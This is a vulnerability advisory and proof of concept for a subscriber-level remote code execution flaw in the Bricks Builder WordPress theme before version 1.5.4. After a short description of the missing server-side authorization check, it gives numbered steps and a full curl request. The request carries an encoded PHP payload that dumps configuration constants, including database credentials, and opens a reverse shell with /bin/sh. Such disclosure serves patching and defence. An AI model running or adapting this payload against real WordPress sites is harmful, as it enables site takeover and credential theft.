Bricks Builder < 1.5.4 - Subscriber+ Remote Code Execution

The theme allows website editors to include executable code blocks in their website, which can contain arbitrary PHP code. By default, code execution is intended to be disabled, with website administrators having to explicitly allow code execution for specific user roles. However, due to improper authorization and input validation, the theme does not perform the necessary checks on the server which would prevent unauthorized users from including executable code blocks on the website, resulting in remote code execution.

PoC

1. Start with a clean Wordpress install 2. Install Bricks builder v1.5.3 3. Enable registrations on the website 4. Register as a new user, log in, and copy the cookies 5. Find a valid postId (e.g. 2 - the ID of Sample Page created by default in new Wordpress installations) 6. Send the following request to the server curl ‘http://example.com/wp-admin/admin-ajax.php’ -X POST \ -H ‘Content-Type: application/x-www-form-urlencoded; charset=UTF-8’ \ -H ‘Cookie: INSERT_COOKIES_HERE’ \ --data-raw ‘action=bricks_save_post&postId;=INSERT_POST_ID_HERE&area;=content&nonce;=0&content;=%5B%7B%22id%22%3A%22aaaaaa%22%2C%22name%22%3A%22code%22%2C%22parent%22%3A0%2C%22children%22%3A%5B%5D%2C%22settings%22%3A%7B%22code%22%3A%22%3C%3Fphp%20echo%20%27Pwned%21%20%3Cpre%3E%27%3B%20var%5Fdump%28get%5Fdefined%5Fconstants%28true%29%5B%27user%27%5D%29%3B%20echo%20%27%3C%2Fpre%3E%27%3B%20%24sock%3Dfsockopen%28%27127%2E0%2E0%2E1%27%2C11111%29%3B%20proc%5Fopen%28%27%2Fbin%2Fsh%20%2Di%27%2C%20array%280%3D%3E%24sock%2C%201%3D%3E%24sock%2C%202%3D%3E%24sock%29%2C%20%24pipes%29%3B%20%3F%3E%22%2C%22executeCode%22%3Atrue%7D%2C%22themeStyles%22%3A%5B%5D%7D%5D’ 7. Open the page, the contents should be replaced with a message reading “Pwned”, a dump of all PHP constants (e.g. database credentials) and a remote shell is opened to 127.0.0.1:11111